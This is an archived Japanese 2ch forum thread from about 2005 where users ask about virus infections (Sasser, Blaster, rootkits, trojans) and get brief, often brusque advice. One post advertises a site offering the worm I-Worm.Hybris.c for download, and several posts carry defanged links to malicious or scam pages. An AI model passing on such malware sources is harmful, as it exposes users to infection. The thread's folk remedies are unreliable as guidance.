ウィルス情報＆質問　総合スレッド☆Part33

ウィルスに関わる話題・質問はこちら。
Winny関連のウィルスは、Download板に専門スレッドがあります。

【　　最　　重　　要　　事　　項　　】
ウィスルやブラクラだと思われる物の直リンは厳禁！！！！！！！！！！
質問の時は頭の『ｈｔ』を抜いて貼り付ける事

【質問する前、書き込む前に必読する】 テンプレサイト
コンピュータウィルス総合スレッド　テンプレミラーサイト（PC初心者板）
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト（Download板）
http://www.geocities.jp/kemkzuenc/Antinny.html

尚、質問・回答が効率的に行えるよう、質問時には次のテンプレを使用してください。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです！
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう！
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■　　※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社　http://www.trendmicro.com/jp/home/personal.htm
　製品名：ウイルスバスター2005インターネットセキュリティ他
・株式会社シマンテック　http://www.symantec.com/region/jp/
　製品名：NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC （バーテックスリンクより移管）
http://www.vintage-solutions.com/Japanese/
　製品名：ANTIDOTE （アンチドート）
・株式会社アラジンジャパン　http://www.aladdin.co.jp
　製品名：eSafeProtect
・コンピュータアソシエイツ株式会社　http://www.caj.co.jp/
　製品名：InocuLAN、CheyenneAntiVirus
・マカフィー株式会社　http://www.mcafee.com/jp/default.asp
　製品名：McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
　http://www.nai.com/japan/download/dat3end.asp　（リンク切れ）
　該当する場合は諦めてノートンかウィルスバスターを買いましょう。

２げｔ
前スレ1000ＧＪ

あぶね！
次スレ立てるところだったｗｗｗｗｗｗｗ
>>1
乙

ウィルス情報＆質問　総合スレッド☆Part32(前スレ)
http://pc8.2ch.net/test/read.cgi/sec/1123855818/

■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
　→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意！
　→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない！
　→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう！
　→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
　→怪しいファイルにウィルスが混入しているケースもよくあることです。
　　怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を！ ■■
　もしウィルスを発見したり、感染してしまったら届け出をしましょう！
★IPAセキュリティセンター　コンピュータウイルスに関する届出について
　http://www.ipa.go.jp/security/outline/todokede-j.html
　こちらに届け出の方法などが記載されています。
　E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。

W32.Sasser.Wormとその亜種にご注意！！
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html

ここの板には不親切な人しかいないのですね
まだ問題は解決していませんよ

「W32/Netsky」ウイルスの亜種（Netsky.Q）に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名：　以下のいずれかひとつ
　　* Mail Delivery System (＜受取人メールアドレス＞)
　　* Failure (＜受取人メールアドレス＞)
　　* Delivered Message (＜受取人メールアドレス＞)
　　* Deliver Mail (＜受取人メールアドレス＞)
　　* Delivery Error (＜受取人メールアドレス＞)
・添付ファイル名：　{ message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
　　　例： date7386.pif 、 message19392.zip など

「W32/Mydoom」（別名：Novarg）ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス（From）：　コンピュータから取得できたアドレスを詐称。
・件名：（以下の候補のいずれかを選択）
　　* Error
　　* Status
　　* Server Report
　　* Mail Transaction Failed
　　* Mail Delivery System
　　* hello
　　* hi
　　[ 任意の文字列 ]
・本文：（以下の候補のいずれかを選択）
　　"test"
　　"The message contains Unicode characters and has been sent as a binary attachment."
　　"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
　　"Mail transaction failed. Partial message is available."
　　[ 任意の文字列 ]　　[ 空白 ]
・添付ファイル名：　ランダムなアルファベット

「がいしゅつです」Q&A
Q1．ノートンを使っていたら、２ｃｈのログからウィルスを発見しました。
　　　ノートンをインストールしたら2chに書けなくなりました。
A1．ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2．ウィルスを検出しましたが、どんなウィルスかわかりません
A2．各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
　　デスクトップの背景が蓮画像になってしまいます 。
A3．Winny関連ウィルスですので、Download板へどうぞ。
　　ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/

Q4．アンチウィルスソフトを持っていないのですが、無料のものはないですか？
A4．このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part5
http://pc5.2ch.net/test/read.cgi/sec/1107065884/

Q5．ホームページが変なページになってしまいます
A5．ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら…助けて下さい！Part52
http://pc5.2ch.net/test/read.cgi/pcqa/1111405528/

関連スレッド

Winnyを狙ったワーム・ニュイルス情報 Part42
http://tmp5.2ch.net/test/read.cgi/download/1123171787/
sasser【スタコラサッサ】sasser　Part２
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ　part5
http://pc8.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その４】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/
エロサイトを見たら…助けてください！Part57
http://pc8.2ch.net/test/read.cgi/pcqa/1122562575/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc8.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc8.2ch.net/test/read.cgi/sec/1027753135/
毎日ｳｨﾙｽﾒｰﾙが送られてくるのですが･･2通目
http://pc8.2ch.net/test/read.cgi/sec/1086494732/

関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/

ググったけど、英語でよくわからない！人は

Excite エキサイト 翻訳 英語翻訳＞ウェブページ翻訳
ttp://www.excite.co.jp/world/english/web/

を使ってみよう。

PC関係の用語が分からない場合は、下記のサイトでも調べて見ましょう。
・IT用語辞典e-Words
http://e-words.jp/
・アスキーデジタル用語辞典
http://yougo.ascii24.com/

前スレ
ウィルス情報＆質問　総合スレッド☆Part32
http://pc8.2ch.net/test/read.cgi/sec/1123855818/

>1
乙カレー

激しくいおつ

おっぱいとカレーライス　　　　ﾊｱﾊｱ

前スレのおっぱい画像くれるウイルスが気になる。

山田じゃん？

前1000ＧＪ

【使用OS】
XP
【WindowsUpdateしてるか】
していません
【AntiVirusは何を使っているか】
ノートン2004
【ちゃんとUpdateしてるか】
しています
【スキャンした結果（ウイルス名・発見場所）】
Trojan Horse 　発見場所 vbsys2.dll
【症状を具体的に、分かる限りすべて書く】
PC動作が重くなったり、スパムメールが多々送られてきます。
【何をしたらそんなことになったのか】
IEエクスプローラを開いた瞬間感染しました
【これまでにとった措置】
ファイルを消去しようと試みましたが、消去できません。
ノートンでスキャンして消そうとも思いましたが無理でした。
【その他の質問】
解決できたとしても やはり受けた症状は残るのでしょうか？

結構緊急なんで指導をよろしくお願いします；；；

はいはいわろすわろす

こないだ、ポルノサイト見てたらオフィスソフトが動き出し何かインストールしてたようだが
あれってスパイウェア？

マルチ氏ね

いわゆるウィルス製造罪法案（刑法改正）が、提出されたけど、成立しそうですね。
http://www.clb.go.jp/bk_law/163/text/ho4.htm
http://www.moj.go.jp/HOUAN/houan34.html
http://d.hatena.ne.jp/HiromitsuTakagi/20040515

アンチウイルスの性能評価をしている「AV Comparitives」の8月のテスト結果。
http://www.av-comparatives.org/seiten/ergebnisse/report07.pdf
http://www.av-comparatives.org/
1位 Kaspersky
2位 Symantec（ﾉｰﾄﾝ）

スパイウェアに対する検出力評価
ttp://www.infoworld.com/article/05/09/19/38FEspy_1.html
1位　F-Secure
2位　Webroot
3位　LANDesk
4位　Sunbelt
5位　SurfControl
6位　McAfee
7位　Trend Micro
8位　eTrust
9位　NOD32 v2.5

>>1
乙！

※大学進学情報の広告サイト「キャンパス・アサヒコム」クラック事件の情報※

シェアが大きな御三家は対応したそうです。

ウイルス駆除の方法について
http://www.campusasahi.com/

※トレンドマイクロ社では、今回のウイルスに関しては、以下のように対応済みとのことです。
■ CHM_DROPPER.CP 日本語情報（トレンドマイクロ社）
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CHM_DROPPER.CP
■ TROJ_DROPPER.PC 日本語情報（トレンドマイクロ社）
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DROPPER.PC
■ BKDR_PCCLIENT.BV 日本語情報（トレンドマイクロ社）
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_PCCLIENT.BV

※シマンテック社では、今回のウイルスに関しては、以下のように対応済みとのことです。
■ Trojan.Dropper（日本語情報）　対応日：2000年02月07日 (米国時間)
http://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.dropper.html
■ Backdoor.Darkmoon.B（英語情報）　対応日：2005年10月21日（米国時間）
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.darkmoon.b.html
（日本語情報については24日頃公開予定とのことです）
■ W32.Kipis.A@mm（日本語）　対応日：2004年12月23日 (米国時間)
http://www.symantec.com/region/jp/avcenter/venc/data/[email protected]
これらのウイルスに対応したウイルス定義ファイルは下記のサイトから入手可能とのことです。
http://www.symantec.com/region/jp/avcenter/download.html

※マカフィー社によりますと、今回のウイルスに関しては、10月20日午前1時ごろにリリースした
「定義ファイル4608」で、対応済みとのことです。
http://www.mcafee.com/japan/security/virB.asp?v=BackDoor-CKB

２ちゃんねるで
添付物を開いたら黒背景に白抜きのニコちゃんマークが
三つ並んだ画面になり
you are idiot a ha ha ha ha！
と合唱して
ウイルスが来ました｡ノートンが、
ファイル名を変更して保存してくれましたが
それでは不十分でしょうか？　(/．；)

添付物ねぇ・・・

ウィルス検出したんですけど・・・。
ＯＳはＸＰで、アップデートはしてます。使ってるのはウィルスバスターです。
ウィルス名はVBS_REDLOF.A-1で、場所はC:\Documents and Settings\（ユーザー名）\Local Settings\Temporary Internet Files\Content.IE5\GXA3KT2J\page013[1].htmです。
なんか、隔離しました（安全です）って書いてあるんやけど、じっさい安全なのでしょうか。

私の姉は、創価学会員で精神科に通院しております。つい最近地区の編成で
バリバリ地区に編成されました。

編成したところ、姉の心理状態が丸っきり変わってしまって”躁状態”になってしました。
日中、深夜かまわず聖教新聞を切り抜いたり、記事に大声で絶賛したり何時間も勤行揚げたり
と忙しくしております。

通院している病院の主治医は、「生活上何か変化ありましたか？」と聞かれても
”実は我が家は創価学会で・・・”と言えずにそのままにしております。
主治医は、なぜ精神状態が変わったのか凄く不思議がっています。

>>30
外因性の躁状態は、反動でもの凄い鬱になるよ。
姉貴が自殺しないように、気をつけな。

,j;;;;;j,. ---一､ ｀ 　―--‐､_ l;;;;;; 　　 池田先生は、偉大な指導者
　｛;;;;;;ゝ T辷iﾌ i 　 　f'辷jァ　 !i;;;;;　　　だから世界中から勲章が贈られるんだ
　 ヾ;;;ﾊ　　　　ﾉ　　　　　　　.::!lﾘ;;rﾞ 　　　　
　　 `Z;i　　　〈.,_..,.　　　　　　ﾉ;;;;;;;;>　　 そんなふうに考えていた時期が
　 　,;ぇﾊ、　､_,.ｰ-､_',. 　 　,ｆﾞ: Y;;f.　　　俺にもありました
　　 ~''戈ヽ 　 ｀二´ 　　 r'´:::.　`!

すいません、ＩＤチェッカーを使って２ちゃんの書き込みから住所が分るって言ってる人がいるんですけど本当なんでしょうか？

http://sports9.2ch.net/test/read.cgi/billiards/1124849366/153
http://sports9.2ch.net/test/read.cgi/billiards/1124849366/159

1000人をどうこうするウィルスってなんすか

教えてください↓のＵＲＬに対してのコメントなのですが、これはノートンが感知しないウィルスなのでしょうか？

http://deadman44-2.jp/cgi-bin/imgboard/img-box/img20041217223836.jpg

742 名前： 名無しの心子知らず [sage] 投稿日： 2005/10/23(日) 13:22:16 ID:X1A4YLRp
あのURLをパソコン詳しい人に見せたら、あれは出回っているのではなくて
自作らしいです。
あれは相手のパソコン内の情報を
見られるらしいよ。メール内容とか。仕掛けた人が。
ウイルスソフトにひっかからないらしいです。
私は開かなかったけど。２ｃｈではあんまりURL開かないほうが良いよ。

↑これは、もういいです。
自己解決しました。

Windowsを起動するたびにようこそ画面こんなメッセージが出るようになりました。

これをあなたが見る頃　私はもう　この世の者ではないでしょうね
もはや死ぬしかなようだ

だけどタダでは死にません

クズを1000匹道連れだ

喜べお前は 605 匹目

他にも、スクリーンセーバーがkimmoというのに変わったり、
ぬるぽ♪ぬるぽ♪オートラン♪
と、いうのもたまにでます。

ちなみにWindowsXpでウィルスバスター２００６を使用しています。
検索では発見されなかったんですが・・・。

最近使い始めたファイル共有ソフトが原因かと思われます。
いろいろググって見ましたがやはりよくわからず・・・。
どなたか対処方法のほどを教えてください。

>>37
＞どなたか対処方法のほどを教えてください

巣に(・∀・)ｶｴﾚ!!!!
http://tmp5.2ch.net/download/

WindowsXPを使ってるんですが
タスクマネージャーを見たらsvchost.exeが六つも有ったんで
びっくりして直ぐさまネットから切り離してスタンドアローンでいろいろ試してるんですが
ノートンでは何も検出されませんでした
他のソフトでもスキャンしたんですが全く知らないexeが大量にでてきただけで状況は変わらず（そのexeは除去しました）
パソコン内をsvchostで検索したんですが出てきたのは
SVCHOST.EX_
SVCHOST.EXE-3530F672pf
svchost.exe
だけでした
ホームのページが変わってたんでスパイウェアをチェックするツールを使って見たんですがCnsMinしか検出されませんでした
タスクマネージャーにあるsvchostはSYSTEMが三つ、NETWORK　SERVICEが二つ、LOCAL　SERVICEが一つです
この書き込みは携帯からやってます
どうか解決方法を教えて下さいお願いします

>>39

砂時計がずっと点滅してるんですが、何かに感染したのでしょうか？

>>39
別に普通じゃないの？俺も5個くらいあった。
もし、ﾕｰｻﾞｰ名で実行されてたら…((((;ﾟдﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>33
ウソです。IDチェッカーは自分のIPを返すだけの、ネタサイトです。

UDPでポート1026,1027,1028,1029,1030に
ガンガン来るんですけど
なんですか

>>44
ICSMGR.exe (インターネット接続の共有) じゃね？

PC再起動したら画面が上下にもごもご動いて止まらなくなりました。
ウイルスだと思うのですが、対処法よろしくお願いします。
酔いそう・・・

【使用OS】windowsXPhomeSP2
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ノートンインターネットセキュリティー２００５
【ちゃんとUpdateしてるか】最後にしたのは２週間ぐらい前だったとおもいます。
【スキャンした結果（ウイルス名・発見場所）】不明
【別のオンラインスキャンしたならその結果は】不明
【症状を具体的に、分かる限りすべて書く】
パソコン起動時にデスクトップが表示されてから、いつものように数秒待っていたら、
いきなり」ブルースクリーンがでて、その後、winddows自体が起動できなくなりました。
起動時こんな文字が出ます。

次のファイルが存在しないかまたは壊れているため、windonwsを
起動できませんでした。
\windos\system32\config\system

オリジナルセットアップCD-ROMからwindowsセットアップ
を起動して、このファイルを修復できます。
修復するには、最初の画面で`R`キーを押してください。

と出ます。
【何をしたらそんなことになったのか】
2chであったゲームをダウンロード→解凍→クリックしたんですが、起動できなかったので削除しました。
そのせいかもしれません。
【これまでにとった措置】
セットアップするためのデータは壊れているHDに入っているんで、どうすればいいかわかりません。
リカバリーCDはついてなくって、買ったときにHDにデータとしてついているんです。
一応、ディスク化できるみたいだったんですが、しないままにこの状態になってしまいました。orz
【その他の質問】
windowsやセーフモードがまったく起動できず、困っております。NECのLaVie LT500/6です

みなさんはじめまして。どうやらまずいページを踏んでしまったようです。
いろいろやったんですが、レジストリの操作で詰まってしまいました。
アドバイスをお願いします。

【使用OS】
　Windows XP SP1

【WindowsUpdateしてるか】
　感染してから約二ヶ月ぶりにしました

【AntiVirusは何を使っているか】
　Norton Internet Security Professional 2004(Norton AntiVirus)

【ちゃんとUpdateしてるか】
　毎週しています

【スキャンした結果（ウイルス名・発見場所）】
　ウィルス名：Hacktool.Rootkit　発見場所：C:\WINDOWS\System32\SVKP.sys

【別のオンラインスキャンしたならその結果は】
　トレンドマイクロオンラインスキャンを行いましたが、すでに検疫していたため何も検出されませんでした。

【症状を具体的に、分かる限りすべて書く】
　今わかっているのはP2Pソフト「Share」を起動すると「Error:loader couldn't initialize service!」とでて、
　同時にAntiVirusがSVKP.sysのHacktool.Rootkitを検出します。
　この際AntiVirusは「修復できませんでした」「アクセスが拒否されました」という反応を示します。

【何をしたらそんなことになったのか】
　tp://cgibin.k-server.org/index2.html
　10/21にここを踏んで感染したみたいです。

続く

>>46
マルチ氏ね

続き
【これまでにとった措置】
　システムの完全スキャンを行いましたが、検出したSVKP.sysを修復できなかったので検疫しました。
　シマンテックのHPで検索をかけましたが、Hacktool.Rootkitのページには対処法が「スキャンする」以外書いておらず、
　完全スキャンでも改善しないのでSVKP.sysを含む他のページを参照しながら対処することに。
　以下は内容が似ていると思われる「W32.Spybot.RDW」のページを参照しました。
　まず感染ファイルを検疫項目から削除し、レジストリから値を削除してみました。
　共通点であるHKEY_LOCAL_MACHINE\System\CurrentControlSet\ENUM\ROOT\LEGACY_SVKPと
　HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SVKPの削除を試みたのですが、
　HKEY_LOCAL_MACHINE\System\CurrentControlSet\ENUM\ROOT\LEGACY_SVKPの削除ができませんでした。
　サービスが邪魔してるのではと思いましたが、services.mscを起動させてもどれが対象のサービスかわかりませんでした。
　しかし、HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SVKPを削除したせいか、
　相変わらずShareは起動しませんがHacktool.rootkitの検出はされなくなりました。
　
【その他】
　初めてregeditを使用してのレジストリ操作を行ったので、正直よくわかりませんでした。
　バックアップを取ってから行いましたが、間違ってしまうと怖いので
　HKEY_LOCAL_MACHINE\Software\Microsoft\OLEの"EnableDCOM" = "N"と
　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsaの"restrictanonymous" = "1"はいじりませんでした。
　
ちょっとした気の緩みから感染してしまったので、本当に悔やむばかりです。
文章は見づらく、浅知恵だらけだとは思いますが、どうか皆さんの力を貸して下さい。よろしくお願いします。

>>48>>50
いつまでもグダグダやってねえでさっさとリカバリーしろ
SP2にしねえんだから、システム自体が弱いんだよ
それに、そんなのに感染したら管理者権限のアカウントが作られた上でアクセス権がいじられているって書いてあるだろうが！
バカ

>>47
"次のファイルが存在しないかまたは壊れている" というエラー メッセージが表示され、Windows XP を起動できない場合の対処方法
ttp://support.microsoft.com/kb/880636/JA/

>>48
P2Pやってる人はDL板へ・・・
まぁ、そんなのにひっかかるのなら他にも何かもらってそうだから、再インストールをお勧めしますが。。。

>>51-52
そう言われて踏ん切りがつきました！！
regeditでSVKPを検索し、リカバリ覚悟で全て消してやりましたｗ
そしたら症状は無くなり、今まで通り使えるようになりましたよ。

>47
自分も同じ症状になって結局リカバリーしますた。

UDPでPort 44871にたくさんパケットが飛んでくるのですが、
なにかワームが流行しているのでしょうか？

>>55
あんたが変なのに感染しているから呼び込んでいるんですよ

>>55
ポートがわかっているなら、↓で調べられたし。
http://www.seifried.org/security/ports/44000/44871.html

WindowsのMessaging Serviceが使ってるので、
香港、大陸からのお漏らしのような希ガス。

2000、XP系のサービスをデフォルトのまま切っていないと、
中国語でデスクトップにメッセージがヒョッコリ出るかも、あるよ。
文字化けがひどいので、悪意かどうかは不明。善意のはずはなかろけど。

>>55
自分もリカバリしたいんですが、Cがないためにできないですorz
>>52さんの方法で一回やってみます

症状：ウイルスっぽい。ログオンして10秒ほどでExplorar.exeが強制終了される。
その数秒後に画面が消える。でもPCやモニターの電源は入ったまま。何押しても無反応。
セーフモードなら起動は出来るがノートン先生が強制終了される。
そしてIEでも他のブラウザでもネットに繋がらない。
お手上げです。原因&対処法わかりませんでしょうか。OSはXPheです。

>>59
リカバリ

※ウイルスの速報
■Mocbot.Aが悪用するのは、「MS05-047」ではなく「MS05-039」だった
http://internet.watch.impress.co.jp/cda/news/2005/10/25/9604.html
当初、Windows XP/2000におけるプラグアンドプレイの脆弱性「MS05-047」を突いて
侵入するとされていたウイルス「Mocbot.A」だが、実際にはMS05-047ではなく、
8月に公開された別のプラグランドプレイの脆弱性「MS05-039」を突くウイルスだったことがわかった。

■2005/10/26で対応しているアンチウイルス製品
ウイルスバスター
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=BKDR%5FMOCBOT%2EA
F-Secure（カスペルスキー含む）
http://www.f-secure.com/weblog/archives/archive-102005.html#00000685
McAfee
http://vil.nai.com/vil/content/v_136637.htm
ノートン
http://securityresponse.symantec.com/avcenter/venc/data/w32.mocbot.a.html

>>59
>Explorar.exe
ﾊﾟﾁﾓﾝですね

TROJ_ABONE.Aってのが検出されたんですが、ググっても情報が出てきません。
トロイということしかわかりません。どんな症状が出るウィルスなんでしょうか？

>>62
つまり、ウイルスによってEXPLORER.EXEが書き換えられているのが原因てことでしょうか？
セーフモードでWINDOWSフォルダ内のEXPLORER.EXEを実行すると、
マイドキュメントが開いただけなんですがおかしいでしょうか？
あと、EXPLORER.EXEは3つあって、WINDOWS内と、WINDOWSのSYSTEM32\DLLCACHEと、
SoftwareDistribution\Download\何か長い文字列 ってとこにあるんですがどれが原因と思われますか？

>>64
よく嫁

>>63
トレンドマイクロの米サイトで見つけた。
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ%5FABONE%2EA&VSect=T
だいぶ前にﾀﾞｳｿ板で少し話題になってたけど、「あぼーん」って命名されていたとは知らんかったなー。
そんなわけですんで、一緒に巣へ帰りましょう。

すみません。3日間調べましたが分かりません。

WinnyでＤＬした動画か音楽関連のファイル（メディアプレイヤー関連のアイコンでした）を
Ｗクリックしたところ、メディアプレイヤー起動後、ビジー状態になりました。
少し待ってもメディアプレイヤーがビジー状態のままだったので、タスクマネージャで強制終了し、
ＰＣを再起動しました。

ところが、ＰＣ起動後、WinnyのＤＬ用にしていたＨＤＤがフォーマットされてしまい、読み取り
不可になってしまいました。
その後ＰＣの調子もわるくなり、ＮＥＴにつながり辛い状態が続いています。
「接続の修復」をすると一時つがるようにはなるのですが、数分するとすぐにつながり辛い状態に
なってしまいます。

NOD32をインストールしてスキャンもしましたが、ダメです。

これって何のウィルスなんでしょうか。どなたか教えて下さい。m(__)m

すいません、>>59のExeplorar.exeは単に俺がスペル間違えただけっす。

補足です。タスクバーやＩＥのツールバーのアイコンの下に変な影のような物が
現れます。（主にＩＥでネットに接続しようとする時です）

よろしくお願いします。

>>67
リカバリ

ワームI-Worm.Hybris.cがダウンロード可能。
ttp://saitorun.ddo.jp
コンピュータ＞ソフト＞コンピュータウィルス

あくまでテスト用に使ってください。

すみません。質問テンプレをアゲます。

【使用OS】 XP SP2
【WindowsUpdateしてるか】
感染時＝△。

【AntiVirusは何を使っているか】
感染時：avast、現在：NOD32

【ちゃんとUpdateしてるか】
してる。

【スキャンした結果（ウイルス名・発見場所）】
Winny2用のDLフォルダ内にキンタマ系ウィルスが5個くらいあった。
PC-CleanでスキャンしたらスパイウェアがウジャウジャHITしたので、全部削除した。

【別のオンラインスキャンしたならその結果は】
していない。

【症状を具体的に、分かる限りすべて書く】
>>67、>>69のとおりです。

【何をしたらそんなことになったのか】
>>67、>>69のとおりです。

【これまでにとった措置】
ググって「Bobax」ではないかと思い、感染したと思われる「csrss.exe
services.exe
smss.exe」を
セットアップディスクから手動で置換。
→一時、症状が良くなったが、翌日には、また元に戻ってしまった。

70もちろん最終手段はそれしかありませんが…。

>>67
さっさとリカバリー　誰もレスなんてしませんよ

>>74の優しさに萌えた(*´Д`)ﾊｧﾊｧ

Winny関連の話題は板違い。→ 【 Download板http://tmp5.2ch.net/download/ 】へ

zipファイルをDLして解凍したらrarが出てきてそれをさらに解凍してしまいました。
どうやらウイルスらしいんですが解決するにはどうすればよいのでしょうか？

>>77
>>1

>>66
ﾄﾝ

ニートの害虫駆除システムはこんな不安に100％おこたえします!
http://www.neat.ne.jp/system.html

⊃http://tool-3.net/?onimusha

⊃http://tool-5.net/?ID

簡易パスクラのみでいきがる荒らし。 ＵＧなど眼中にないらしい。 そんな痛い椰子らの目を覚まさしてやってくれ。

xpでPokey駆除どうやるんだ(つд・)

【使用OS】 　ＸＰ
【WindowsUpdateしてるか】　 してない
【AntiVirusは何を使っているか】　ウィルスバスター2005
【ちゃんとUpdateしてるか】 昨日した
【スキャンした結果（ウイルス名・発見場所）】
・TROJ DELF.OP　
・TORJ　CLICKER.CK　

【症状を具体的に、分かる限りすべて書く】 　不明
【何をしたらそんなことになったのか】 なにかふんだらしい

頻繁にウィルスバスターが反応します。で、隔離できるものとできないものがあります。

>>83
>【WindowsUpdateしてるか】　 してない

　　　論外！！　　はい　次

>>83
感染したって別にいいじゃん　リカバリー

>>83
そうやって「感染」「駆除」を何度も繰り返して滅茶苦茶なシステムを構築してください。
今にまともに動かなくなるし、穴を空けられてリモート操作されるかもしれない。
ファイアーウォールがまともに動いているうちはいいんだけどね。

ウイルスバスターオンラインスキャン、なんか変更あったみたいですよ。
新しい使用許諾が必要になったような・・・

ネットを見ていると、
突然あやしいエラーメッセージが出て
（レジストリが壊れているとかなんとか、、、）
ここ(下記)を見ろと書いてあり
tp://www.winfix32.com/
見れば「Doctor Cleaner」と言うソフトのサイトじゃないですか。
「scan now」なんていうボタンがあったりして、ますます怪しい。
これは一体なんなんでしょうか？
ウィルスの一種なんでしょうか？

